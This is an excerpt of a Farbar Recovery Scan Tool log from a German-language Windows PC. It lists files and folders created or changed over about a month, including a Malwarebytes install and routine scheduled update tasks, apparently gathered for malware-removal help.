2020-12-02 21:38 - 2020-12-02 22:24 - 000025982 _____ C:\Users\Tom\Desktop\FRST.txt
2020-12-02 21:38 - 2020-12-02 21:38 - 000000000 ____D C:\Users\Tom\Desktop\FRST-OlderVersion
2020-12-02 21:37 - 2020-12-02 22:24 - 000000000 ____D C:\FRST
2020-12-02 21:37 - 2020-12-02 21:38 - 002288640 _____ (Farbar) C:\Users\Tom\Desktop\FRST64.exe
2020-12-02 21:35 - 2020-12-02 21:35 - 000010256 _____ C:\Users\Tom\Desktop\2020_12_02 Malwarebyte.txt
2020-12-02 21:31 - 2020-12-02 21:31 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000000000 ____D C:\Users\Tom\AppData\Local\mbam
2020-12-02 21:30 - 2020-12-02 21:30 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\Program Files\Malwarebytes
2020-12-02 21:06 - 2020-12-02 21:06 - 000030894 _____ C:\Users\Tom\Desktop\Vodafone - Network Abuse Report.html
2020-12-02 21:06 - 2020-12-02 21:06 - 000000000 ____D C:\Users\Tom\Desktop\Vodafone - Network Abuse Report-Dateien
2020-11-28 20:30 - 2020-11-28 20:30 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-28 20:27 - 2020-11-28 20:27 - 000000020 ___SH C:\Users\Vincent\ntuser.ini
2020-11-28 19:48 - 2020-12-02 22:24 - 000061440 _____ C:\Users\Tom\AppData\Roaming\cookies.sqlite
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\Users\Public\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\ProgramData\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer Generals and Zero Hour
2020-11-24 10:54 - 2020-11-24 10:54 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-11-16 10:30 - 2020-11-16 10:30 - 000000020 ___SH C:\Users\Tom_Admin\ntuser.ini
2020-11-16 10:30 - 2020-11-16 10:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2020-11-11 07:09 - 2020-11-11 07:09 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:09 - 2020-11-11 07:09 - 000009265 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-11-11 07:08 - 2020-11-11 07:08 - 000363520 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000197632 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000152576 _____ C:\WINDOWS\system32\EoAExperiences.exe
2020-11-10 11:03 - 2020-11-28 20:05 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-10 11:01 - 2020-11-28 10:15 - 000003606 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6b7481de5e69e
2020-11-10 11:01 - 2020-11-10 11:01 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2020-11-10 11:00 - 2020-11-10 11:00 - 000000020 ___SH C:\Users\Tom\ntuser.ini
2020-11-10 10:59 - 2020-12-02 22:23 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-10 10:59 - 2020-11-28 20:29 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1003
2020-11-10 10:59 - 2020-11-28 20:28 - 000004256 _____ C:\WINDOWS\system32\Tasks\Opera GX scheduled Autoupdate 1581624516
2020-11-10 10:59 - 2020-11-28 10:15 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-25 08:33 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-10 10:59 - 2020-11-16 10:30 - 000003650 _____ C:\WINDOWS\system32\Tasks\GarminUpdaterTask
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagwrn.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagerr.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000003558 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-10 10:59 - 000003404 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003334 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003220 _____ C:\WINDOWS\system32\Tasks\Intel PTT EK Recertification
2020-11-10 10:59 - 2020-11-10 10:59 - 000003180 _____ C:\WINDOWS\system32\Tasks\klcp_update
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002956 _____ C:\WINDOWS\system32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002932 _____ C:\WINDOWS\system32\Tasks\WebDiscover Browser Update Task
2020-11-10 10:59 - 2020-11-10 10:59 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1002
2020-11-10 10:59 - 2020-11-10 10:59 - 000002838 _____ C:\WINDOWS\system32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 _SHDL C:\Documents and Settings
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\NCH Software
2020-11-10 10:57 - 2020-11-10 10:57 - 000000368 ____H C:\WINDOWS\Tasks\Intel PTT EK Recertification.job
2020-11-10 10:53 - 2020-12-02 22:23 - 000008192 ___SH C:\DumpStack.log.tmp
2020-11-10 10:53 - 2020-12-02 20:53 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-10 10:53 - 2020-11-11 17:52 - 000444272 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-10 10:53 - 2020-11-10 11:00 - 000000000 ____D C:\Windows.old
2020-11-10 09:46 - 2020-11-10 10:53 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2020-11-10 09:44 - 2020-11-28 20:29 - 000002385 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2020-11-28 20:27 - 000000000 ____D C:\Users\Vincent
2020-11-10 09:44 - 2020-11-16 10:30 - 000000000 ____D C:\Users\Tom_Admin
2020-11-10 09:44 - 2020-11-10 11:00 - 000000000 ____D C:\Users\Tom
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Anwendungsdaten
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:43 - 2020-11-10 09:46 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2020-11-10 09:42 - 2020-11-10 09:42 - 006012185 _____ C:\Users\Tom\Desktop\2020-11-10_Schwaebische_Zeitung_Laupheim_-_10-11-2020.pdf
2020-11-10 09:42 - 2020-11-10 09:42 - 000000000 ____D C:\ProgramData\ssh
2020-11-10 09:40 - 2020-11-10 09:40 - 004898144 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 003860832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 001822256 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001393472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001354080 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001309504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2020-11-10 09:40 - 2020-11-10 09:40 - 001091936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001032544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000980320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000915296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000732000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000611952 _____ C:\WINDOWS\SysWOW64\TextShaping.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000455168 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2020-11-10 09:40 - 2020-11-10 09:40 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000137016 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000111616 _____ C:\WINDOWS\system32\RDVGHelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000101688 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000056672 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000048640 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000047472 _____ C:\WINDOWS\SysWOW64\umpdc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000045880 _____ C:\WINDOWS\system32\HvSocket.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000039936 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ (The ICU Project) C:\WINDOWS\system32\icu.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000707544 _____ C:\WINDOWS\system32\TextShaping.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000645120 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000306176 _____ C:\WINDOWS\system32\HeatCore.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000287232 _____ C:\WINDOWS\system32\CoreMas.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000165376 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-10 09:39 - 2020-11-10 09:39 - 000089088 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000073216 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.internal.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000064552 _____ C:\WINDOWS\system32\umpdc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000029696 _____ (The ICU Project) C:\WINDOWS\system32\icuuc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000025088 _____ (The ICU Project) C:\WINDOWS\system32\icuin.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\SysWOW64\xpsrchvw.xml
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\system32\xpsrchvw.xml
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\MSBuild
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\MSBuild
2020-11-10 09:28 - 2020-11-10 09:28 - 000008192 _____ C:\WINDOWS\system32\config\userdiff
2020-11-10 09:10 - 2020-11-28 19:58 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-11-10 09:08 - 2020-11-10 11:00 - 000000000 ___DC C:\WINDOWS\Panther
2020-11-10 09:05 - 2020-11-10 09:05 - 000000000 ___HD C:\$WinREAgent
2020-11-09 10:15 - 2020-11-09 10:15 - 000000685 _____ C:\Users\Tom\Desktop\opensearch.xml

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-12-02 22:24 - 2017-12-04 20:37 - 000000000 ____D C:\ProgramData\Origin
2020-12-02 22:24 - 2017-12-02 16:35 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\Mozilla
2020-12-02 22:23 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-12-02 22:23 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Hauppauge
2020-12-02 22:23 - 2017-12-04 20:37 - 000000000 ____D C:\Users\Tom\AppData\Local\Origin
2020-12-02 22:23 - 2017-12-02 07:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-12-02 22:22 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-12-02 22:08 - 2020-10-22 18:33 - 000002361 _____ C:\Users\Tom_Admin\Desktop\Microsoft Edge.lnk
2020-12-02 22:08 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-12-02 22:08 - 2017-12-01 17:06 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Packages
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 ___RD C:\Users\Tom_Admin\3D Objects
2020-12-02 21:30 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-12-02 20:53 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2020-12-02 20:07 - 2017-12-04 20:38 - 000000000 ____D C:\Program Files (x86)\Origin
2020-12-01 14:51 - 2020-07-02 17:43 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-12-01 05:06 - 2017-12-04 20:39 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Origin
2020-11-29 23:36 - 2017-12-27 17:28 - 000000000 ____D C:\Users\Tom\.mediathek3
2020-11-29 17:05 - 2017-12-04 20:40 - 000000000 ____D C:\Program Files (x86)\Origin Games
2020-11-29 12:03 - 2018-03-20 16:18 - 000000000 ____D C:\Users\Tom\Desktop\Ebay-Bilder
2020-11-28 20:33 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Discord
2020-11-28 20:33 - 2017-12-02 13:07 - 000000000 ____D C:\Users\Vincent\AppData\LocalLow\Mozilla
2020-11-28 20:31 - 2020-02-19 14:17 - 000000000 ____D C:\Users\Vincent\AppData\Local\Ubisoft Game Launcher
2020-11-28 20:29 - 2017-12-02 13:05 - 000000000 ___RD C:\Users\Vincent\OneDrive
2020-11-28 20:28 - 2020-02-13 21:08 - 000001434 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Local\Discord
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ___RD C:\Users\Vincent\3D Objects
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ____D C:\Users\Vincent\AppData\Local\Packages
2020-11-28 20:05 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2020-11-28 20:05 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2020-11-28 20:05 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2020-11-28 19:58 - 2017-12-01 17:39 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-28 19:57 - 2017-12-06 18:20 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Origin
2020-11-28 19:53 - 2018-11-21 19:15 - 000000000 ____D C:\Users\Tom_Admin\Documents\Command and Conquer Generals Zero Hour Data
2020-11-28 19:44 - 2017-12-04 20:38 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Origin
2020-11-28 18:49 - 2017-12-04 21:48 - 000000000 ____D C:\Users\Tom\Documents\Command and Conquer Generals Zero Hour Data
2020-11-27 13:35 - 2019-04-05 07:38 - 000000000 ____D C:\Program Files (x86)\StarMoney 12 Basic
2020-11-25 12:56 - 2020-03-23 18:41 - 000028432 _____ C:\Users\Tom\Desktop\Corona-Entwicklung.xlsx
2020-11-25 08:33 - 2020-03-05 20:01 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-24 20:40 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-11-24 20:36 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-11-24 11:48 - 2017-12-27 17:34 - 000000000 ____D C:\Users\Tom\AppData\Roaming\vlc
2020-11-24 10:54 - 2017-12-01 17:39 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-19 23:49 - 2020-09-30 01:00 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-16 22:07 - 2020-09-30 01:00 - 000722760 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-16 22:07 - 2020-09-30 01:00 - 000470344 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-11-16 10:31 - 2019-04-08 06:22 - 000000000 ____D C:\Users\Tom\AppData\Local\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\ProgramData\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\Program Files (x86)\Garmin
2020-11-16 10:30 - 2017-12-02 07:41 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-15 13:40 - 2019-07-18 09:27 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-11-11 17:51 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
